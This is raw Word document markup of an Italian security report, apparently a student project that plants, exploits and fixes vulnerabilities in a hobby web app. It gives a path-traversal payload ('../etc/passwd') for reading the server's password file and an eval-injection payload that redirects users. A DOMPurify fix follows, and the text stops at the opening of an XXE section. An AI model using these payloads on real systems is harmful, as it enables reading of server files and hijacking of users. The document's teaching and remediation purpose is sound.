          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251973632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3084E0BC" wp14:editId="33D1C5A7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-625475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6484620" cy="1890289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="833750839"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4620" cy="1890289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0076032B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>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5ACE464B"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9"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J0GgIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3B90EBA6" w14:textId="5ACE464B"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2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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payload: </w:t>
      </w:r>
      <w:r w:rsidR="002F292A">
        <w:t>../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244260B" w14:textId="4010E34F" w:rsidR="00071E32" w:rsidRDefault="0076032B" w:rsidP="0076032B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>che permette di leggere il file con le password salvate sul sistema dove viene eseguito il backend (Figura</w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).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6EFE8923"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3</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70"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WHAIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L066JN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fmVuFhwCAABABAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAUAAYACAAAACEAwFn1WOIAAAAMAQAADwAAAAAAAAAAAAAAAAB2BAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsFBgAAAAAEAAQA8wAAAIUFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="728D3A7D" w14:textId="6EFE8923"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>43</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6DE59BA7">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2BF1570C"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r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getImage()</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</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backend introducendo dei controlli sul nome del path dove cercare l’immagine, sia nella POST </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve">che richiama la </w:t>
      </w:r>
      <w:r w:rsidR="004E2F86" w:rsidRPr="004E2F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> (Figura 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t>che nella GET</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="00E12B17">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004E2F86">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007F2270">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E571A5" w14:textId="77777777" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3130819C" w14:textId="0685E0B2" w:rsidR="0076032B" w:rsidRDefault="00850623" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251974656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A8854CB" wp14:editId="34616E91">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-663575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6499860" cy="2866532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1974647181"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9860" cy="2866532"/>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6A907B9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44</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71"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lpGwIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L066JOi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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5D9F0165" w14:textId="6A907B9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44</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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1AD61803" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D0C1CC" w14:textId="609A6FAD" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B07345" w14:textId="5B2BF918" w:rsidR="005A6F04" w:rsidRDefault="005A6F04" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AA3F4E" w14:textId="06BD01B5" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763A96FC" w14:textId="76DF2F04" w:rsidR="008B6F6D" w:rsidRDefault="00850623" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251975680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40344C77" wp14:editId="6B1BA60F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>81280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4995250" cy="3950970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="139384317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5250" cy="3950970"/>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7440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BC901BC" wp14:editId="791F318C">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3490E2CF"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4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72"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ABt4WRGgIAAEAEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQIt&#10;ABQABgAIAAAAIQB156Wx4AAAAAsBAAAPAAAAAAAAAAAAAAAAAHQEAABkcnMvZG93bnJldi54bWxQ&#10;SwUGAAAAAAQABADzAAAAgQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E01E25D" w14:textId="3490E2CF"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>45</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="050DABB5" w14:textId="4C9385CF" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E906230" w14:textId="3FD6324E" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C57FCE9" w14:textId="10A7B8FD" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="003620AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5039EC28" w14:textId="7A890DB1"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0895D741" w:rsidR="005D6BD8" w:rsidRPr="000C7E72" w:rsidRDefault="005D6BD8" w:rsidP="000C7E72">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Malicious code Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24403F" w14:textId="56AF5007" w:rsidR="000C7E72" w:rsidRDefault="000C7E72" w:rsidP="00467BBC">
      <w:r w:rsidRPr="000C7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HobbiePages.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4794F" w14:textId="170CB5C7" w:rsidR="000C7E72" w:rsidRDefault="000C7E72" w:rsidP="00467BBC">
      <w:r w:rsidRPr="000C7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20BAF2" w14:textId="32C31333" w:rsidR="007D3F5D" w:rsidRDefault="007D3F5D" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Si tratta di una vulnerabilità che ha lo scopo di inserire codice malevolo </w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t>in modo da farlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eseguir</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lato utente. Ciò è possibile a causa di una mancanza di validazione di istruzioni che ricevono input dall’utente, consentendo l’interpretazione e l’esecuzione di tale codice da pare </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dell’applicazione.</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t xml:space="preserve"> Nel nostro codice è stata usata l’istruzione </w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t xml:space="preserve"> di Javascript per fare </w:t>
      </w:r>
      <w:r w:rsidR="00850623">
        <w:t>l’injection; infatti,</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t xml:space="preserve"> il suo utilizzo risulta sconsigliato (Figura 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA3A9E9" w14:textId="0960599A" w:rsidR="00850623" w:rsidRPr="000C7E72" w:rsidRDefault="00850623" w:rsidP="00467BBC">
      <w:r>
        <w:t>Nel nostro codice è stato modificato HobbiePages.jsx e viene richiamato quando l’utente clicca l’hobby. L’idea iniziale è quella di inserire un alert che mostri le informazioni di contatto del business creatore dell’hobby (Figura 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>). Tuttavia, dato un certo input è possibile inserire un’istruzione che fa il redirect ad un sito malevolo. In questo caso è stato usato il sito di Google come esempio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402712CC" w14:textId="2CE91D8A" w:rsidR="00D12C9A" w:rsidRDefault="000C7E72" w:rsidP="00467BBC">
      <w:r w:rsidRPr="000C7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1460B1" w14:textId="68BD9FF3" w:rsidR="000C7E72" w:rsidRDefault="000C7E72" w:rsidP="000C7E72">
      <w:r>
        <w:t>Un attacante dovrebbe autenticarsi come utente business, inserire l’url al sito malevolo nelle sue informazioni di contatto con l’obiettivo di farlo aprire ad un utente normale. Questo è il payload da inserire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE4456" w14:textId="77777777" w:rsidR="000C7E72" w:rsidRDefault="000C7E72" w:rsidP="000C7E72">
      <w:r w:rsidRPr="001B4E1A">
        <w:t>');window.location.href = 'https://www.google.com'//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24408AAA" w14:textId="056E2001" w:rsidR="000C7E72" w:rsidRDefault="00850623" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251976704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A886FEB" wp14:editId="3BA663F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>144780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4486275" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="102804595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39488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2452BF4E" wp14:editId="26AA7390">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1115060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>734695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3890010" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1626880317" name="Casella di tes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CA8881E" w14:textId="1333DC94"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>46</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>:</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00820CA8">
                              <w:t xml:space="preserve"> HobbiePages.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BF4E" id="_x0000_s1073" type="#_x0000_t202" style="position:absolute;margin-left:87.8pt;margin-top:57.85pt;width:306.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GwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2CA8881E" w14:textId="1333DC94"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>46</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>:</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00820CA8">
                        <w:t xml:space="preserve"> HobbiePages.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDB41A" w14:textId="3C165238" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="316CCD0D" w14:textId="31A77B0C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="36EF52B8" w14:textId="01284AA3" w:rsidR="00D12C9A" w:rsidRDefault="00850623" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251977728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EAC282F" wp14:editId="01C40970">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>157480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3970020" cy="4177603"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1968493984"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020" cy="4177603"/>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41536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F18D84C" wp14:editId="6D48D92B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1374140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4409440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3368040" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1090546498" name="Casella di tes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2CF0E46" w14:textId="07FC1311"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>47</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: HobbiePages.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D84C" id="_x0000_s1074" type="#_x0000_t202" style="position:absolute;margin-left:108.2pt;margin-top:347.2pt;width:26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pC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xrcUkhSbTT/H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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="12CF0E46" w14:textId="07FC1311"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>47</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbiePages.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C6E1A" w14:textId="6631638B" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58F16B52" w14:textId="2F98151E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1906DDFE" w14:textId="791E32E7" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="23C4E922" w14:textId="3E7F2218" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6658EDA7" w14:textId="558E08F2" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7AEB9243" w14:textId="66795975" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="70773928" w14:textId="5EAA7110"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3E359D32" w14:textId="77777777" w:rsidR="00850623" w:rsidRDefault="00850623" w:rsidP="00467BBC"/>
    <w:p w14:paraId="69AEA784" w14:textId="77777777" w:rsidR="000C7E72" w:rsidRDefault="00A54E4E" w:rsidP="00467BBC">
      <w:r w:rsidRPr="000C7E72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67095FFB" w14:textId="29E4D0B9" w:rsidR="004B30FC" w:rsidRDefault="00850623" w:rsidP="00467BBC">
      <w:r>
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidR="000C7E72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A54E4E">
        <w:t>stato usato DOMPurify per sanitizzare l’input ed è stato eliminato l’eval che è fonte di attacchi</w:t>
      </w:r>
      <w:r w:rsidR="000C60C5">
        <w:t>, come mostrato in Figura 4</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A54E4E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBB59E" w14:textId="4B8DF783" w:rsidR="0031586D" w:rsidRDefault="00850623" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251978752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="138F3560" wp14:editId="54E10A43">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>64135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4400550" cy="1356964"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="464627115"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1356964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000C60C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251843584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="093D83C9" wp14:editId="623F0A5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>945515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1497330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4229100" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1215165153" name="Casella di testo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DBA513" w14:textId="2B503871"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>48</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: HobbiePages.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3C9" id="_x0000_s1075" type="#_x0000_t202" style="position:absolute;margin-left:74.45pt;margin-top:117.9pt;width:3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qGgIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0ADBA513" w14:textId="2B503871"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>48</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbiePages.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520C281" w14:textId="46EB4A4B"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31398132" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="00FC6F6C"/>
    <w:p w14:paraId="25AE0CF0" w14:textId="77777777" w:rsidR="0096086E" w:rsidRDefault="0096086E" w:rsidP="00FC6F6C"/>
    <w:p w14:paraId="649C3F64" w14:textId="2F25D638" w:rsidR="0031586D" w:rsidRPr="000C60C5" w:rsidRDefault="00FD7204" w:rsidP="000C60C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7204">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">XML parsing vulnerable to XEE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5A1E5" w14:textId="427FFE9A" w:rsidR="00370316" w:rsidRDefault="000C60C5" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: HobbyController.java, HobbiePages.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CAB38" w14:textId="5AF8A888" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 134 di HobbyController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5282F701" w14:textId="77777777" w:rsidR="000C60C5" w:rsidRDefault="000C60C5" w:rsidP="009B3431">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DEE9FD" w14:textId="5CC18B6D" w:rsidR="000C60C5" w:rsidRDefault="00450AE3" w:rsidP="000C60C5">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel caso in cui un’applicazione fa utilizzo di dati </w:t>
      </w:r>
      <w:r w:rsidRPr="0096086E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>, questa vulnerabilità consente a un attaccante di interferire con il normale processamento di tali dati, sfruttando alcuni costrutti tipici del linguaggio XML come DTD e</w:t>
      </w:r>
      <w:r w:rsidR="00850623">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> external entities, consentendo spesso l’accesso al filesystem del server. </w:t>
      </w:r>
    </w:p>
